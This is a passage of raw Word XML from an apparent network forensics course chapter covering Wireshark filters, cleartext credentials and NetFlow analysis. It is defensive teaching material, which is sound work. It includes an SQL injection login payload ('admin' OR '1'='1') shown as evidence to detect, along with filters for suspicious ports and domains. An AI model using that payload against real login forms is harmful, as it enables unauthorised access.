              <w:t xml:space="preserve">Capture on a separate sensor machine (never on the suspect). Record start/end time and interface, hash the PCAP file straight after capture, and keep the original. Mind privacy and legal authority — packet captures can contain passwords and personal messages.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Network forensic process</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">■ Process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rPr>
          <w:cantSplit/>
        </w:trPr>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Identify sources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Collect data</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Preserve &amp; hash</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Examine traffic</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Correlate with endpoint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Reconstruct &amp; report</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 Packet Capture Analysis with Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the most popular free packet analyser. It can capture live traffic and open saved </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PCAP/PCAPNG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> files, and decodes hundreds of protocols so that every field of every packet can be read.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Capture filter vs display filter</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Capture filter</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Display filter</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Applied</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Before capture (limits what is saved)</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After capture (hides packets from view; data remains)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Syntax</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BPF, e.g. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">host 10.0.0.5 and port 80</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Wireshark syntax, e.g. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ip.addr == 10.0.0.5 &amp;&amp; tcp.port == 80</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Forensic advice</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Avoid — you may lose evidence</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 freely to focus on what matters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Useful display filters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898"/>
        <w:gridCol w:w="5848"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>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Filter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="584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Shows</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ip.addr == 192.168.1.10</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All traffic to or from this IP</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ip.src == x.x.x.x &amp;&amp; ip.dst == y.y.y.y</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Traffic in one direction between two hosts</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tcp.port == 4444</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">udp.port == 53</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Traffic on a port</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http</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dns</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ftp</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smtp</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One protocol</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http.request.method == "POST"</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HTTP POST requests (form submissions — login, SQL injection)</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ftp.request.command == "PASS"</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FTP password commands</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dns.qry.name contains "evil"</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DNS lookups of a suspicious domain</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tcp.flags.syn == 1 &amp;&amp; tcp.flags.ack == 0</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Connection attempts (SYN) — useful to spot scans</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frame.time &gt;= "2024-03-05 23:00:00"</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Packets from a given time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Wireshark features for investigators</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Follow TCP/HTTP Stream</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — joins the packets of one connection and shows the whole conversation in readable text: the commands typed, the pages requested, or credentials sent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">File → Export Objects → HTTP / SMB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — saves files that were transferred (images, executables, documents). The extracted file can be hashed and checked on VirusTotal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Statistics → Conversations / Endpoints</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — lists which IP pairs talked the most; large transfers stand out.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Statistics → Protocol Hierarchy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — shows unusual protocols.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Statistics → I/O Graph</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — shows traffic volume over time; useful for spotting regular beacons or bursts of exfiltration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Expert Information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — warnings about retransmissions, resets and malformed packets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cleartext credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Older protocols such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">FTP, Telnet, HTTP (without TLS) and POP3/IMAP without SSL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> send usernames and passwords as plain text. An investigator who follows the TCP stream of an FTP session sees lines such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">USER admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PASS Secret@123</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. This helps to prove what an attacker obtained — and is the reason defenders should use SFTP, SSH and HTTPS.</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SQL injection in a POST body</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Using the filter </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">http.request.method == "POST"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, an analyst sees a request to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">/login.php</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> whose body contains </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">username=admin' OR '1'='1&amp;password=x</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">. The quote characters and the OR condition are classic signs of an SQL injection attempt. The server’s response (length, status 200 vs 302 redirect) shows whether it worked.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3 NetFlow and Traffic Flow Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">NetFlow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Cisco; the standard version is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">IPFIX</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sFlow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a similar sampled technology) is a way for routers and switches to summarise traffic into </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">flow records</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">flow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a set of packets sharing the same five-tuple during a period. Think of it as a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">phone bill</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (who called whom, when, for how long) rather than a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">call recording</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PCAP).</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898"/>
        <w:gridCol w:w="5848"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>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 flow record contains</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="584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Source and destination IP and port, protocol</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10.1.1.25:51514 → 203.0.113.10:443, TCP</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Start time, end time, duration</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02:14:05 → 02:46:50</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Number of packets and bytes</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420,000 packets, 530 MB</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TCP flags, interface, ToS</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SYN, ACK, FIN</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Full PCAP</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NetFlow</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Content</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Complete, including payload</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Metadata only</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Size</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Huge (GBs per hour)</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Tiny (about 0.1–1% of the traffic size)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Retention</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Days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Months or years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Best use</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Deep analysis of a known event</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Finding </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">where to look</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">; baselining; long-term history</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Common tools to read flows are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">nfdump/nfsen</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SiLK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, ntopng and SIEMs like Splunk. Typical findings from flows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A workstation sending </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">large volumes of data outbound</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to an unknown IP at night — possible exfiltration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Many connections to many ports on one host (port scan) or to many hosts on one port (network sweep).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
